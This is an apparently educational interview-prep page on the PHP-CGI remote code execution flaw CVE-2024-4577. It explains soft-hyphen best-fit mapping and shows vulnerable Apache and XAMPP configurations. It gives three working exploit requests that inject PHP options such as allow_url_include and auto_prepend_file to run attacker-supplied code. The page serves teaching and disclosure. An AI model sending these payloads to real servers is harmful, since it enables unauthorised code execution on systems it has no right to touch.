Interview Bank
  • Interview Bank
  • Web
    • Persistent Connection and Non Persistent
    • CDN
    • Code Review
    • JWT
      • JWT vs Session Based Authentication
      • JWT Challenge
      • JWE
      • JWS
    • Content Security Policy (CSP)
    • Same-origin Policy (SOP)
    • Cross-Origin Resource Sharing (CORS)
      • Exploiting CORS
    • HTTP Strict Transport Security (HSTS)
    • SQL Injection (SQLi)
    • Password Encryption in Login APIs
    • API Security
      • API Principles
    • Simple bypass PHP
    • Server-side Template Injection (SSTI)
    • Javascript Object and Inheritance
    • HTTP/2
    • Cookie vs Local vs session Storage
    • XML External Entity (XXE)
    • What happened when enter domain name in browser
    • Prototype Pollution - Part 1
    • Prototype Pollution - Part 2
    • Nginx vs Apache
  • OT Security
    • Securing Operational Technology: Understanding OT Security
  • Quantum Computing
    • Quantum Computing: Unveiling the Cryptographic Paradigm Shift
    • Quantum Obfuscation: Shielding Code in the Quantum Era
  • DevSecOps
    • Continuous Integration/Continuous Deployment Pipeline Security
    • Chaos Engineering Overview
      • Security Chaos Engineering
    • Mysql VS redis
    • Kubernetes (k8s)
    • How MySQL executes query
    • REDIS
    • Difference between cache and buffer
  • Windows
    • Pentesting Active Directory - Active Directory 101
    • Pentesting Active Directory - Kerberos (Part 1)
    • Pentesting Active Directory - Kerberos (Part 2)
    • AD vs Kerberos vs LDAP
    • Active Directory Certificate Services Part 1
    • Unconstrained Delegation
    • AS-REP Roasting
    • NTLM Relay via SMB
    • LLMRN
    • Windows lateral movement
    • Constrained Delegation
    • Resource-Based Constrained Delegation
    • IFEO (lmage File Execution Options) Hijacking
  • UNIX
    • Setuid
  • Large Language Models (LLMs)
    • Tokens
    • LangChain
    • Integration and Security
  • Android
    • Keystore
  • Red team development
    • Secure C2 Infrastructure
    • P Invoke in c#
    • D Invoke
    • ExitProcess vs ExitThread
  • Blue Team
    • Indicators of Compromise
    • Methods to prevent Email domain spoofing
    • Windows Prefetching
  • CVE
    • XZ Outbreak CVE-2024-3094
    • Log4J Vulnerability (CVE-2021-44228)
    • SolarWinds Hack (CVE-2020-10148)
    • PHP CGI RCE (CVE-2024-4577)
    • Windows Recall
  • Software Architecture
    • Microservices
    • KVM
  • Docker
    • Overview
    • Daemon Socket
    • Tips to reduce docker size
  • Blockchain
    • Overview
    • Smart Contract
  • Business Acumen
    • Market Research Reports and Perception
    • Understanding Acquisitions
    • Cybersecurity as a Business Strategy
  • Cyber Teams
    • Introduction to Purple Teaming
  • Malware
    • Dynamic Sandbox Limitations
Powered by GitBook
On this page
  • How to Determine if You Are Vulnerable to Attack?
  • Evil Soft Hyphen
  • What is Common gateway Interface?
  • So what?
  • Best fit mapping
  • Scenario One: Setting PHP to run under CGI mode In the Apache Httpd configuration file
  • Scenario Two: Exposing the PHP executable to the public (Default installation setting in XAMPP)
  • Different type of EXP
  • EXP 1
  • EXP 2
  • EXP 3
  • Demo
  • Interview Question
  • Author
  • Reference
  1. CVE

PHP CGI RCE (CVE-2024-4577)

The PHP programming language, during its design, neglected the Best-Fit character encoding conversion feature inherent in Windows operating systems. This oversight allows unauthenticated attackers to bypass protections from the old CVE-2012-1823 by using specific character sequences to perform attacks such as parameter injection, subsequently executing arbitrary code on remote PHP servers.

Scope of Impact This vulnerability affects all PHP versions installed on Windows operating systems. For detailed information, refer to the table below:

  • PHP 8.3 < 8.3.8

  • PHP 8.2 < 8.2.20

  • PHP 8.1 < 8.1.29

How to Determine if You Are Vulnerable to Attack?

For common setups involving the Apache HTTP Server combined with PHP, website administrators can confirm whether their server is vulnerable using the two methods listed in this article. Notably, Scenario Two is also the default setting during the installation of XAMPP for Windows, implying that all versions of XAMPP for Windows are inherently affected by this vulnerability.

At the time of writing this article, it has been verified that unauthorized attackers can execute arbitrary code on remote servers running Windows operating systems in the following language environments:

  • Traditional Chinese (Code page 950)

  • Simplified Chinese (Code page 936)

  • Japanese (Code page 932)

For other Windows operating systems operating in English, Korean, and Western European languages, due to the extensive use of PHP and the inability to comprehensively list and rule out all exploitable scenarios, it is still recommended that users thoroughly inventory their assets, verify usage scenarios, and update PHP to the latest version to ensure maximum security.

Evil Soft Hyphen

A soft hyphen (represented in HTML as &shy;) is an invisible character used to indicate an optional hyphenation point within a line of text. In web development, the soft hyphen is often used in long words or URLs to allow for automatic line breaks at the edge of the display without altering the actual content or meaning of the text.

What is Common gateway Interface?

The Common Gateway Interface (CGI) is a standard protocol that defines how web servers can interact with executable programs installed on a server that generate web pages dynamically. Such programs are called CGI scripts; they can be written in any programming language, including PHP.

In the context of PHP and web development, CGI acts as a bridge between the PHP script and the web server, allowing the server to pass data, like form inputs or request details, to the PHP script. The PHP script processes this data and sends back the generated HTML (or other data types) to the server, which then sends it to the client's browser.

Example:

So what?

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

one of them is soft hyphen(0xAD) and one of them is "dash"(0x2D)

While they both appear the same to you and me, they have vastly different meanings to the OS.

Best fit mapping

PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

Scenario One: Setting PHP to run under CGI mode In the Apache Httpd configuration file

when HTTP requests are directed to the PHP-CGI executable using the Action directive, this setup is affected by the vulnerability. Common configurations include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario Two: Exposing the PHP executable to the public (Default installation setting in XAMPP)

Even if PHP is not configured to run under CGI mode, simply exposing the PHP executable in the CGI directory also subjects it to this vulnerability. Common situations include, but are not limited to:

  • Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.

  • Exposing the PHP installation directory externally through ScriptAlias, such as:

ScriptAlias /php-cgi/ "C:/xampp/php/"

Different type of EXP

EXP 1

SSRF

http://PhpVulnEnv/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 2

POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv

<?php phpinfo();?>

EXP 3

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv
REDIRECT-STATUS: XCANWIN

<?php phpinfo();?>

Demo

Interview Question

1) Why is XAMPP being infected the most in this CVE?

2) What is best fit mapping how it cause this Vulnerability?

3) Which setting you have to modify to fix this issue?

Author

Reference

PreviousSolarWinds Hack (CVE-2020-10148)NextWindows Recall

Last updated 10 months ago

querystrings are parsed and passed to the PHP interpreter on the command line - a request such as as might be executed as php.exe -cgi.php foo=bar

http://host/cgi.php?foo=bar
Ikonw
Logo資安通報:PHP 遠端程式碼執行 (CVE-2024-4577) - PHP CGI 參數注入弱點 | DEVCORE 戴夫寇爾DEVCORE 戴夫寇爾
Logohttps://mp.weixin.qq.com/mp/wappoc_appmsgcaptcha?poc_token=HFj3amajFr1bUBstRri7lGhHA70Gus9G7sywHr1p&target_url=https%3A%2F%2Fmp.weixin.qq.com%2Fs%2F93TuxZ4AVqHXcnJw3M4hRg
LogoNo Way, PHP Strikes Again! (CVE-2024-4577)watchTowr Labs - Blog
8MB
CVE Demo.mp4
Demo Video